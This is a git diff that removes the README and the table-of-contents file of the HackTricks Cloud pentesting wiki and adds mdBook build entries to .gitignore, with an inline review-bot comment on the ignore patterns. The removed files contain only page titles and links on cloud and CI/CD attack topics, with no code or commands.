diff --git a/.gitbook/assets/empty.zip b/.gitbook/assets/empty.zip
deleted file mode 100644
index 15cb0ecb3..000000000
Binary files a/.gitbook/assets/empty.zip and /dev/null differ
diff --git a/.gitignore b/.gitignore
index 6826262d3..7fa947732 100644
--- a/.gitignore
+++ b/.gitignore
@@ -30,4 +30,9 @@ Icon
 .AppleDesktop
 Network Trash Folder
 Temporary Items
-.apdisk
\ No newline at end of file
+.apdisk
+
+#Mdbook
+book
+book/*
+hacktricks-preprocessor.log
diff --git a/README.md b/README.md
deleted file mode 100644
index 17db20c7d..000000000
--- a/README.md
+++ /dev/null
@@ -1,67 +0,0 @@
-# HackTricks Cloud
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
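Review bot: The added `book` and `book/*` patterns in the `.gitignore` hunk overlap — a bare `book` entry already matches the directory and everything beneath it, so `book/*` adds nothing and one of the two can be dropped (keep only `book/*` instead of `book` if you ever need to un-ignore a file inside it with a `!book/.keep` rule, which a directory-level ignore does not allow). Be aware that `.gitignore` only prevents future additions: if `book/` or `hacktricks-preprocessor.log` had already been committed before this change, they remain tracked until removed with `git rm -r --cached book hacktricks-preprocessor.log`, and a build log in particular is worth checking for leaked local paths or tokens before it is ever pushed. Minor style point: `#Mdbook` would read better as `# mdBook`, matching the tool's own casing and the usual space after `#`.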
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -
- -_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ - -{% hint style="success" %} -Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news. -{% endhint %} - -### **Pentesting CI/CD Methodology** - -**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:** - -{% content-ref url="pentesting-ci-cd/pentesting-ci-cd-methodology.md" %} -[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md) -{% endcontent-ref %} - -### Pentesting Cloud Methodology - -**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:** - -{% content-ref url="pentesting-cloud/pentesting-cloud-methodology.md" %} -[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md) -{% endcontent-ref %} - -### License & Disclaimer - -**Check them in:** - -{% content-ref url="https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq" %} -[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) -{% endcontent-ref %} - -### Github Stats - -![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/SUMMARY.md b/SUMMARY.md deleted file mode 100644 index 921ed2d3d..000000000 --- a/SUMMARY.md +++ /dev/null 
@@ -1,503 +0,0 @@ -# Table of contents - -## 👽 Welcome! - -* [HackTricks Cloud](README.md) -* [About the Author](https://book.hacktricks.xyz/welcome/about-the-author) -* [HackTricks Values & faq](https://book.hacktricks.xyz/welcome/hacktricks-values-and-faq) - -## 🏭 Pentesting CI/CD - -* [Pentesting CI/CD Methodology](pentesting-ci-cd/pentesting-ci-cd-methodology.md) -* [Github Security](pentesting-ci-cd/github-security/README.md) - * [Abusing Github Actions](pentesting-ci-cd/github-security/abusing-github-actions/README.md) - * [Gh Actions - Artifact Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md) - * [GH Actions - Cache Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md) - * [Gh Actions - Context Script Injections](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md) - * [Accessible Deleted Data in Github](pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md) - * [Basic Github Information](pentesting-ci-cd/github-security/basic-github-information.md) -* [Gitea Security](pentesting-ci-cd/gitea-security/README.md) - * [Basic Gitea Information](pentesting-ci-cd/gitea-security/basic-gitea-information.md) -* [Concourse Security](pentesting-ci-cd/concourse-security/README.md) - * [Concourse Architecture](pentesting-ci-cd/concourse-security/concourse-architecture.md) - * [Concourse Lab Creation](pentesting-ci-cd/concourse-security/concourse-lab-creation.md) - * [Concourse Enumeration & Attacks](pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md) -* [CircleCI Security](pentesting-ci-cd/circleci-security.md) -* [TravisCI Security](pentesting-ci-cd/travisci-security/README.md) - * [Basic TravisCI Information](pentesting-ci-cd/travisci-security/basic-travisci-information.md) -* [Jenkins Security](pentesting-ci-cd/jenkins-security/README.md) - * [Basic Jenkins 
Information](pentesting-ci-cd/jenkins-security/basic-jenkins-information.md) - * [Jenkins RCE with Groovy Script](pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md) - * [Jenkins RCE Creating/Modifying Project](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md) - * [Jenkins RCE Creating/Modifying Pipeline](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md) - * [Jenkins Arbitrary File Read to RCE via "Remember Me"](pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md) - * [Jenkins Dumping Secrets from Groovy](pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md) -* [Apache Airflow Security](pentesting-ci-cd/apache-airflow-security/README.md) - * [Airflow Configuration](pentesting-ci-cd/apache-airflow-security/airflow-configuration.md) - * [Airflow RBAC](pentesting-ci-cd/apache-airflow-security/airflow-rbac.md) -* [Terraform Security](pentesting-ci-cd/terraform-security.md) -* [Atlantis Security](pentesting-ci-cd/atlantis-security.md) -* [Cloudflare Security](pentesting-ci-cd/cloudflare-security/README.md) - * [Cloudflare Domains](pentesting-ci-cd/cloudflare-security/cloudflare-domains.md) - * [Cloudflare Zero Trust Network](pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md) -* [Okta Security](pentesting-ci-cd/okta-security/README.md) - * [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md) -* [Serverless.com Security](pentesting-ci-cd/serverless.com-security.md) -* [Supabase Security](pentesting-ci-cd/supabase-security.md) -* [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md) -* [Vercel Security](pentesting-ci-cd/vercel-security.md) -* [TODO](pentesting-ci-cd/todo.md) - -## ⛈️ Pentesting Cloud - -* [Pentesting Cloud Methodology](pentesting-cloud/pentesting-cloud-methodology.md) -* [Kubernetes 
Pentesting](pentesting-cloud/kubernetes-security/README.md) - * [Kubernetes Basics](pentesting-cloud/kubernetes-security/kubernetes-basics.md) - * [Pentesting Kubernetes Services](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md) - * [Kubelet Authentication & Authorization](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md) - * [Exposing Services in Kubernetes](pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md) - * [Attacking Kubernetes from inside a Pod](pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md) - * [Kubernetes Enumeration](pentesting-cloud/kubernetes-security/kubernetes-enumeration.md) - * [Kubernetes Role-Based Access Control(RBAC)](pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md) - * [Abusing Roles/ClusterRoles in Kubernetes](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md) - * [Pod Escape Privileges](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) - * [Kubernetes Roles Abuse Lab](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md) - * [Kubernetes Namespace Escalation](pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md) - * [Kubernetes External Secret Operator](pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md) - * [Kubernetes Pivoting to Clouds](pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md) - * [Kubernetes Network Attacks](pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md) - * [Kubernetes Hardening](pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md) - * [Kubernetes SecurityContext(s)](pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md) - * [Kubernetes OPA 
Gatekeeper](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md) - * [Kubernetes OPA Gatekeeper bypass](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md) - * [Kubernetes Kyverno](pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md) - * [Kubernetes Kyverno bypass](pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md) - * [Kubernetes ValidatingWebhookConfiguration](pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md) -* [GCP Pentesting](pentesting-cloud/gcp-security/README.md) - * [GCP - Basic Information](pentesting-cloud/gcp-security/gcp-basic-information/README.md) - * [GCP - Federation Abuse](pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md) - * [GCP - Permissions for a Pentest](pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md) - * [GCP - Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/README.md) - * [GCP - App Engine Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md) - * [GCP - Artifact Registry Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md) - * [GCP - Cloud Build Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) - * [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) - * [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) - * [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) - * [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) - * [GCP - Compute Post 
Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) - * [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md) - * [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md) - * [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md) - * [GCP - Logging Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md) - * [GCP - Monitoring Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md) - * [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) - * [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) - * [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) - * [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) - * [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) - * [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) - * [GCP - Apikeys Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md) - * [GCP - AppEngine Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md) - * [GCP - Artifact Registry Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md) - * [GCP - Batch Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md) - * [GCP - BigQuery 
Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md) - * [GCP - ClientAuthConfig Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md) - * [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md) - * [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) - * [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) - * [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) - * [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) - * [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) - * [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) - * [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md) - * [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) - * [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) - * [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) - * [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md) - * [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md) - * [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md) - * [GCP - Run Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md) - * [GCP - Secretmanager 
Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md) - * [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md) - * [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md) - * [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md) - * [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md) - * [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md) - * [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md) - * [GCP - local privilege escalation ssh pivoting](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) - * [GCP - Persistence](pentesting-cloud/gcp-security/gcp-persistence/README.md) - * [GCP - API Keys Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md) - * [GCP - App Engine Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md) - * [GCP - Artifact Registry Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md) - * [GCP - BigQuery Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md) - * [GCP - Cloud Functions Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md) - * [GCP - Cloud Run Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md) - * [GCP - Cloud Shell Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md) - * [GCP - Cloud SQL Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md) - * [GCP - Compute 
Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md) - * [GCP - Dataflow Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md) - * [GCP - Filestore Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md) - * [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md) - * [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md) - * [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md) - * [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md) - * [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md) - * [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md) - * [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md) - * [GCP - App Engine Enum](pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md) - * [GCP - Artifact Registry Enum](pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md) - * [GCP - Batch Enum](pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md) - * [GCP - Bigquery Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md) - * [GCP - Bigtable Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md) - * [GCP - Cloud Build Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md) - * [GCP - Cloud Functions Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md) - * [GCP - Cloud Run Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md) - * [GCP - Cloud Shell Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md) - * [GCP - Cloud SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md) - * [GCP - Cloud Scheduler 
Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md) - * [GCP - Compute Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md) - * [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md) - * [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md) - * [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md) - * [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md) - * [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md) - * [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md) - * [GCP - Firebase Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md) - * [GCP - Firestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md) - * [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md) - * [GCP - KMS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md) - * [GCP - Logging Enum](pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md) - * [GCP - Memorystore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md) - * [GCP - Monitoring Enum](pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md) - * [GCP - Pub/Sub Enum](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md) - * [GCP - Secrets Manager Enum](pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md) - * [GCP - Security Enum](pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md) - * [GCP - Source Repositories Enum](pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md) - * [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md) - * [GCP - Stackdriver 
Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md) - * [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md) - * [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md) - * [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md) - * [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md) - * [GCP - Unauthenticated Enum & Access](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md) - * [GCP - API Keys Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md) - * [GCP - App Engine Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md) - * [GCP - Artifact Registry Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md) - * [GCP - Cloud Build Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md) - * [GCP - Cloud Functions Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md) - * [GCP - Cloud Run Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md) - * [GCP - Cloud SQL Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md) - * [GCP - Compute Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md) - * [GCP - IAM, Principals & Org Unauthenticated 
Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md) - * [GCP - Source Repositories Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md) - * [GCP - Storage Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md) - * [GCP - Public Buckets Privilege Escalation](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md) -* [GWS - Workspace Pentesting](pentesting-cloud/workspace-security/README.md) - * [GWS - Post Exploitation](pentesting-cloud/workspace-security/gws-post-exploitation.md) - * [GWS - Persistence](pentesting-cloud/workspace-security/gws-persistence.md) - * [GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID)](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md) - * [GWS - Admin Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md) - * [GCDS - Google Cloud Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md) - * [GCPW - Google Credential Provider for Windows](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md) - * [GPS - Google Password Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md) - * [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md) - * [GWS - App 
Scripts](pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md) -* [AWS Pentesting](pentesting-cloud/aws-security/README.md) - * [AWS - Basic Information](pentesting-cloud/aws-security/aws-basic-information/README.md) - * [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md) - * [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md) - * [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md) - * [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md) - * [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md) - * [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md) - * [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md) - * [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md) - * [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md) - * [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md) - * [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md) - * [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md) - * [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md) - * [AWS - Lambda Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md) - * [AWS - Abusing Lambda Extensions](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md) - * [AWS - Lambda Layers Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md) - * [AWS - Lightsail 
Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md) - * [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md) - * [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md) - * [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md) - * [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md) - * [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md) - * [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md) - * [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md) - * [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md) - * [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md) - * [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md) - * [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md) - * [AWS - CodeBuild Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md) - * [AWS Codebuild - Token Leakage](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md) - * [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md) - * [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md) - * [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md) - * [AWS - EC2, EBS, SSM & VPC Post 
